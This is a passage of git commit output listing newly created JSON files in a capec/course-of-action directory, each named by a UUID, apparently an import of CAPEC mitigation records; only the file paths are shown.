capec/course-of-action/course-of-action--82f0acf3-ba9d-4c82-861c-d3196fe81e05.json create mode 100644 capec/course-of-action/course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf.json create mode 100644 capec/course-of-action/course-of-action--847153ab-45d7-433c-877d-91be6e450830.json create mode 100644 capec/course-of-action/course-of-action--85441b75-53ba-49bb-b7f9-538a9a5c48c3.json create mode 100644 capec/course-of-action/course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40.json create mode 100644 capec/course-of-action/course-of-action--860deb05-098f-491a-b16a-b8e57469c59d.json create mode 100644 capec/course-of-action/course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d.json create mode 100644 capec/course-of-action/course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60.json create mode 100644 capec/course-of-action/course-of-action--8765b029-9621-452e-9a68-6ea740a42ece.json create mode 100644 capec/course-of-action/course-of-action--882b19e3-3b15-46be-addd-876476f8e56d.json create mode 100644 capec/course-of-action/course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac.json create mode 100644 capec/course-of-action/course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343.json create mode 100644 capec/course-of-action/course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d.json create mode 100644 capec/course-of-action/course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32.json create mode 100644 capec/course-of-action/course-of-action--8981135f-0874-4377-91a7-60102c6c6d08.json create mode 100644 capec/course-of-action/course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73.json create mode 100644 capec/course-of-action/course-of-action--8bfe4f1a-bebf-4ed7-9bff-2316e1882b77.json create mode 100644 capec/course-of-action/course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728.json create mode 100644 capec/course-of-action/course-of-action--8c96de40-cb0e-47f1-832b-52967352e806.json create mode 100644 capec/course-of-action/course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb.json create mode 100644 capec/course-of-action/course-of-action--8d140f53-1195-4d07-a821-5dff65f5021a.json create mode 100644 capec/course-of-action/course-of-action--8d86079c-91d7-4810-81a1-5de9fa958dbf.json create mode 100644 capec/course-of-action/course-of-action--8dfa992d-4cf0-49b0-9e30-75e0aa0371fa.json create mode 100644 capec/course-of-action/course-of-action--8f12dfb6-e5d2-493f-80c8-de6d843475b6.json create mode 100644 capec/course-of-action/course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714.json create mode 100644 capec/course-of-action/course-of-action--9019abc7-8715-4102-9d16-de27541d1372.json create mode 100644 capec/course-of-action/course-of-action--9096203e-c235-4aad-a35e-ee0728293df7.json create mode 100644 capec/course-of-action/course-of-action--910ff626-f0db-4d42-9310-318119856ee6.json create mode 100644 capec/course-of-action/course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04.json create mode 100644 capec/course-of-action/course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c.json create mode 100644 capec/course-of-action/course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d.json create mode 100644 capec/course-of-action/course-of-action--925956b6-2678-4433-9afe-3074a2ec9305.json create mode 100644 capec/course-of-action/course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828.json create mode 100644 capec/course-of-action/course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7.json create mode 100644 capec/course-of-action/course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7.json create mode 100644 capec/course-of-action/course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429.json create mode 100644 capec/course-of-action/course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84.json create mode 100644 capec/course-of-action/course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261.json create mode 100644 capec/course-of-action/course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b.json create mode 100644 capec/course-of-action/course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f.json create mode 100644 capec/course-of-action/course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555.json create mode 100644 capec/course-of-action/course-of-action--95e7a500-58db-4a4b-8516-24b61e683322.json create mode 100644 capec/course-of-action/course-of-action--95f18f82-c186-43df-937f-09ecf87853d6.json create mode 100644 capec/course-of-action/course-of-action--96c87468-200e-4be4-a794-c97c7366f580.json create mode 100644 capec/course-of-action/course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc.json create mode 100644 capec/course-of-action/course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d.json create mode 100644 capec/course-of-action/course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b.json create mode 100644 capec/course-of-action/course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01.json create mode 100644 capec/course-of-action/course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d.json create mode 100644 capec/course-of-action/course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a.json create mode 100644 capec/course-of-action/course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73.json create mode 100644 capec/course-of-action/course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc.json create mode 100644 capec/course-of-action/course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283.json create mode 100644 capec/course-of-action/course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d.json create mode 100644 capec/course-of-action/course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e.json create mode 100644 capec/course-of-action/course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1.json create mode 100644 capec/course-of-action/course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b.json create mode 100644 capec/course-of-action/course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08.json create mode 100644 capec/course-of-action/course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a.json create mode 100644 capec/course-of-action/course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa.json create mode 100644 capec/course-of-action/course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d.json create mode 100644 capec/course-of-action/course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5.json create mode 100644 capec/course-of-action/course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb.json create mode 100644 capec/course-of-action/course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4.json create mode 100644 capec/course-of-action/course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5.json create mode 100644 capec/course-of-action/course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0.json create mode 100644 capec/course-of-action/course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe.json create mode 100644 capec/course-of-action/course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b.json create mode 100644 capec/course-of-action/course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921.json create mode 100644 capec/course-of-action/course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566.json create mode 100644 capec/course-of-action/course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a.json create mode 100644 capec/course-of-action/course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af.json create mode 100644 capec/course-of-action/course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348.json create mode 100644 capec/course-of-action/course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a.json create mode 100644 capec/course-of-action/course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56.json create mode 100644 capec/course-of-action/course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d.json create mode 100644 capec/course-of-action/course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f.json create mode 100644 capec/course-of-action/course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be.json create mode 100644 capec/course-of-action/course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618.json create mode 100644 capec/course-of-action/course-of-action--a584f684-db15-4faa-94d2-5a729f32f979.json create mode 100644 capec/course-of-action/course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb.json create mode 100644 capec/course-of-action/course-of-action--a6775324-11a4-4066-80ff-bc354993450c.json create mode 100644 capec/course-of-action/course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59.json create mode 100644 capec/course-of-action/course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648.json create mode 100644 capec/course-of-action/course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2.json create mode 100644 capec/course-of-action/course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce.json create mode 100644 capec/course-of-action/course-of-action--a785e881-67df-42d6-93ba-1febf606948b.json create mode 100644 capec/course-of-action/course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5.json create mode 100644 capec/course-of-action/course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca.json create mode 100644 capec/course-of-action/course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9.json create mode 100644 capec/course-of-action/course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19.json create mode 100644 capec/course-of-action/course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452.json create mode 100644 capec/course-of-action/course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4.json create mode 100644 capec/course-of-action/course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238.json create mode 100644 capec/course-of-action/course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f.json create mode 100644 capec/course-of-action/course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c.json create mode 100644 capec/course-of-action/course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c.json create mode 100644 capec/course-of-action/course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b.json create mode 100644 capec/course-of-action/course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877.json create mode 100644 capec/course-of-action/course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4.json create mode 100644 capec/course-of-action/course-of-action--ab283457-b87f-426c-a8ca-40500059244b.json create mode 100644 capec/course-of-action/course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f.json create mode 100644 capec/course-of-action/course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97.json create mode 100644 capec/course-of-action/course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a.json create mode 100644 capec/course-of-action/course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44.json create mode 100644 capec/course-of-action/course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f.json create mode 100644 capec/course-of-action/course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d.json create mode 100644 capec/course-of-action/course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a.json create mode 100644 capec/course-of-action/course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc.json create mode 100644 capec/course-of-action/course-of-action--ada16564-6893-4613-ab31-1956904689fa.json create mode 100644 capec/course-of-action/course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e.json create mode 100644 capec/course-of-action/course-of-action--aebeb944-089d-4f75-825e-35491ce299d5.json create mode 100644 capec/course-of-action/course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b.json create mode 100644 capec/course-of-action/course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b.json create mode 100644 capec/course-of-action/course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1.json create mode 100644 capec/course-of-action/course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691.json create mode 100644 capec/course-of-action/course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955.json create mode 100644 capec/course-of-action/course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39.json create mode 100644 capec/course-of-action/course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1.json create mode 100644 capec/course-of-action/course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e.json create mode 100644 capec/course-of-action/course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946.json create mode 100644 capec/course-of-action/course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f.json create mode 100644 capec/course-of-action/course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad.json create mode 100644 capec/course-of-action/course-of-action--b4faff18-8772-40e7-babb-756dd6a05950.json create mode 100644 capec/course-of-action/course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a.json create mode 100644 capec/course-of-action/course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa.json create mode 100644 capec/course-of-action/course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d.json create mode 100644 capec/course-of-action/course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab.json create mode 100644 capec/course-of-action/course-of-action--b669e453-8bfb-4dd3-bee9-992473335348.json create mode 100644 capec/course-of-action/course-of-action--b6bea51f-2de9-4093-b738-636c45211da1.json create mode 100644 capec/course-of-action/course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f.json create mode 100644 capec/course-of-action/course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109.json create mode 100644 capec/course-of-action/course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0.json create mode 100644 capec/course-of-action/course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28.json create mode 100644 capec/course-of-action/course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856.json create mode 100644 capec/course-of-action/course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae.json create mode 100644 capec/course-of-action/course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33.json create mode 100644 capec/course-of-action/course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879.json create mode 100644 capec/course-of-action/course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f.json create mode 100644 capec/course-of-action/course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21.json create mode 100644 capec/course-of-action/course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027.json create mode 100644 capec/course-of-action/course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8.json create mode 100644 capec/course-of-action/course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2.json create mode 100644 capec/course-of-action/course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be.json create mode 100644 capec/course-of-action/course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4.json create mode 100644 capec/course-of-action/course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12.json create mode 100644 capec/course-of-action/course-of-action--bce5f53e-f172-44e5-9663-605f8f248104.json create mode 100644 capec/course-of-action/course-of-action--bcfdbdbd-ba28-4e96-9aed-e24eafa7f94a.json create mode 100644 capec/course-of-action/course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279.json create mode 100644 capec/course-of-action/course-of-action--bda14fae-49f5-4ad2-a29e-764ae02120dd.json create mode 100644 capec/course-of-action/course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce.json create mode 100644 capec/course-of-action/course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89.json create mode 100644 capec/course-of-action/course-of-action--be2c5e21-2ecf-45bb-8167-6cbe5589e9ad.json create mode 100644 capec/course-of-action/course-of-action--be73445d-6303-4867-9786-1fbc879fefad.json create mode 100644 capec/course-of-action/course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd.json create mode 100644 capec/course-of-action/course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5.json create mode 100644 capec/course-of-action/course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47.json create mode 100644 capec/course-of-action/course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83.json create mode 100644 capec/course-of-action/course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf.json create mode 100644 capec/course-of-action/course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d.json create mode 100644 capec/course-of-action/course-of-action--c1177fe7-2157-4379-b994-7102720779ab.json create mode 100644 capec/course-of-action/course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8.json create mode 100644 capec/course-of-action/course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107.json create mode 100644 capec/course-of-action/course-of-action--c1f0798d-f510-4b11-b628-dfa20014d117.json create mode 100644 capec/course-of-action/course-of-action--c22b6204-a5ec-49b8-b8b0-017d26455943.json create mode 100644 capec/course-of-action/course-of-action--c2e44548-0605-43ff-ba41-c2a820c9f7f8.json create mode 100644 capec/course-of-action/course-of-action--c3b2b74c-78d3-4ea4-90e6-66d9552867fe.json create mode 100644 capec/course-of-action/course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd.json create mode 100644 capec/course-of-action/course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c.json create mode 100644 capec/course-of-action/course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567.json create mode 100644 capec/course-of-action/course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88.json create mode 100644 capec/course-of-action/course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72.json create mode 100644 capec/course-of-action/course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa.json create mode 100644 capec/course-of-action/course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4.json create mode 100644 capec/course-of-action/course-of-action--c56b417e-08dd-48c9-8d7a-4a2a252008ad.json create mode 100644 capec/course-of-action/course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899.json create mode 100644 capec/course-of-action/course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d.json create mode 100644 capec/course-of-action/course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417.json create mode 100644 capec/course-of-action/course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea.json create mode 100644 capec/course-of-action/course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de.json create mode 100644 capec/course-of-action/course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb.json create mode 100644 capec/course-of-action/course-of-action--ca984166-6914-410d-bb5a-97d296f8a505.json create mode 100644 capec/course-of-action/course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063.json create mode 100644 capec/course-of-action/course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752.json create mode 100644 capec/course-of-action/course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356.json create mode 100644 capec/course-of-action/course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094.json create mode 100644 capec/course-of-action/course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c.json create mode 100644 capec/course-of-action/course-of-action--cea57129-2096-4707-a328-617470bd4c96.json create mode 100644 capec/course-of-action/course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0.json create mode 100644 capec/course-of-action/course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d.json create mode 100644 capec/course-of-action/course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f.json create mode 100644 capec/course-of-action/course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375.json create mode 100644 capec/course-of-action/course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74.json create mode 100644 capec/course-of-action/course-of-action--d23ad838-17c7-483f-9c9e-409581bff898.json create mode 100644 capec/course-of-action/course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0.json create mode 100644 capec/course-of-action/course-of-action--d2766301-f13d-4357-b351-decc874545f9.json create mode 100644 capec/course-of-action/course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847.json create mode 100644 capec/course-of-action/course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f.json create mode 100644 capec/course-of-action/course-of-action--d2e2f760-3e91-480d-a010-51c7214317af.json create mode 100644 capec/course-of-action/course-of-action--d32c1276-0d53-4aed-93c1-390329302d45.json create mode 100644 capec/course-of-action/course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08.json create mode 100644 capec/course-of-action/course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396.json create mode 100644 capec/course-of-action/course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40.json create mode 100644 capec/course-of-action/course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356.json create mode 100644 capec/course-of-action/course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167.json create mode 100644 capec/course-of-action/course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41.json create mode 100644 capec/course-of-action/course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415.json create mode 100644 capec/course-of-action/course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43.json create mode 100644 capec/course-of-action/course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e.json create mode 100644 capec/course-of-action/course-of-action--d87a2576-bfa8-4ce3-8928-fd1b1e3b6a64.json create mode 100644 capec/course-of-action/course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4.json create mode 100644 capec/course-of-action/course-of-action--da850044-15b8-4e5e-8e40-08eba6b4fdee.json create mode 100644 capec/course-of-action/course-of-action--daa82e33-b38f-4b0d-8a94-c85e8b3d57ef.json create mode 100644 capec/course-of-action/course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b.json create mode 100644 capec/course-of-action/course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495.json create mode 100644 capec/course-of-action/course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c.json create mode 100644 capec/course-of-action/course-of-action--dbf98824-2003-44af-87f6-70a7b758c158.json create mode 100644 capec/course-of-action/course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a.json create mode 100644 capec/course-of-action/course-of-action--dc06e25a-ebf3-4958-a253-78d3abc83b7a.json create mode 100644 capec/course-of-action/course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221.json create mode 100644 capec/course-of-action/course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d.json create mode 100644 capec/course-of-action/course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5.json create mode 100644 capec/course-of-action/course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0.json create mode 100644 capec/course-of-action/course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57.json create mode 100644 capec/course-of-action/course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e.json create mode 100644 capec/course-of-action/course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128.json create mode 100644 capec/course-of-action/course-of-action--de575342-7f82-440a-8860-a403ad7a0590.json create mode 100644 capec/course-of-action/course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a.json create mode 100644 capec/course-of-action/course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d.json create mode 100644 capec/course-of-action/course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9.json create mode 100644 capec/course-of-action/course-of-action--df2e871a-78b5-4ba1-83d2-30886d304580.json create mode 100644 capec/course-of-action/course-of-action--dfb8c9ec-2f27-4bdd-a86b-e89823d238d8.json create mode 100644 capec/course-of-action/course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535.json create mode 100644 capec/course-of-action/course-of-action--e04fa978-708c-4f71-8057-c7f3a317801e.json create mode 100644 capec/course-of-action/course-of-action--e179c216-27fd-4547-9dce-78b800823e09.json create mode 100644 capec/course-of-action/course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257.json create mode 100644 capec/course-of-action/course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63.json create mode 100644 capec/course-of-action/course-of-action--e2706dc6-3de4-4fe9-bea1-e4dc299d2135.json create mode 100644 capec/course-of-action/course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea.json create mode 100644 capec/course-of-action/course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671.json create mode 100644 capec/course-of-action/course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec.json create mode 100644 capec/course-of-action/course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe.json create mode 100644 capec/course-of-action/course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b.json create mode 100644 capec/course-of-action/course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9.json create mode 100644 capec/course-of-action/course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726.json create mode 100644 capec/course-of-action/course-of-action--e4adb3b1-70c1-4e55-a3f0-446e8a7e2245.json create mode 100644 capec/course-of-action/course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7.json create mode 100644 capec/course-of-action/course-of-action--e71a404e-6c1e-4f7b-ad58-6275749c3c7a.json create mode 100644 capec/course-of-action/course-of-action--e771e07e-01bf-4984-b3e0-fab66906ffdb.json create mode 100644 capec/course-of-action/course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa.json create mode 100644 capec/course-of-action/course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684.json create mode 100644 capec/course-of-action/course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118.json create mode 100644 capec/course-of-action/course-of-action--e8ea0f31-fe05-4ac8-90d7-23321f8bbde9.json create mode 100644 capec/course-of-action/course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43.json create mode 100644 capec/course-of-action/course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3.json create mode 100644 capec/course-of-action/course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2.json create mode 100644 capec/course-of-action/course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848.json create mode 100644 capec/course-of-action/course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65.json create mode 100644 capec/course-of-action/course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af.json create mode 100644 capec/course-of-action/course-of-action--ebb71328-0223-4062-8a80-43070611f373.json create mode 100644 capec/course-of-action/course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070.json create mode 100644 capec/course-of-action/course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca.json create mode 100644 capec/course-of-action/course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1.json create mode 100644 capec/course-of-action/course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007.json create mode 100644 capec/course-of-action/course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c.json create mode 100644 capec/course-of-action/course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e.json create mode 100644 capec/course-of-action/course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31.json create mode 100644 capec/course-of-action/course-of-action--ef8cf2b1-ae89-4ec8-a600-9a4f8fa9a090.json create mode 100644 capec/course-of-action/course-of-action--efcb3542-d85e-4edb-bc6c-abd9bb30475c.json create mode 100644 capec/course-of-action/course-of-action--f010580e-dc07-4767-a265-30e908fb80a8.json create mode 100644 capec/course-of-action/course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34.json create mode 100644 capec/course-of-action/course-of-action--f12b8ad6-f41b-4ce6-bc2e-c335d0849b55.json create mode 100644 capec/course-of-action/course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44.json create mode 100644 capec/course-of-action/course-of-action--f4ab1297-f95e-461d-83c8-7238df98791d.json create mode 100644 capec/course-of-action/course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167.json create mode 100644 capec/course-of-action/course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d.json create mode 100644 capec/course-of-action/course-of-action--f5e96e7d-763e-4a94-b572-6045ebb70de2.json create mode 100644 capec/course-of-action/course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0.json create mode 100644 capec/course-of-action/course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97.json create mode 100644 capec/course-of-action/course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c.json create mode 100644 capec/course-of-action/course-of-action--f7a4c49a-70b4-4e12-afa1-c4753210529c.json create mode 100644 capec/course-of-action/course-of-action--f7ad58c5-d680-449d-8437-2608358e11d3.json create mode 100644 capec/course-of-action/course-of-action--f7b7948b-56c5-4b4c-bc36-db934b7ca567.json create mode 100644 capec/course-of-action/course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b.json create mode 100644 capec/course-of-action/course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d.json create mode 100644 capec/course-of-action/course-of-action--f8390fd2-04de-4837-bb2c-f9e8bcf81c13.json create mode 100644 capec/course-of-action/course-of-action--f878e5bb-cbbf-4be1-a964-0ecbfb858bf9.json create mode 100644 capec/course-of-action/course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4.json create mode 100644 capec/course-of-action/course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2.json create mode 100644 capec/course-of-action/course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb.json create mode 100644 capec/course-of-action/course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f.json create mode 100644 capec/course-of-action/course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f.json create mode 100644 capec/course-of-action/course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7.json create mode 100644 capec/course-of-action/course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34.json create mode 100644 capec/course-of-action/course-of-action--fab76528-99af-4cf9-8786-33b6ca964343.json create mode 100644 capec/course-of-action/course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987.json create mode 100644 capec/course-of-action/course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f.json create mode 100644 capec/course-of-action/course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff.json create mode 100644 capec/course-of-action/course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a.json create mode 100644 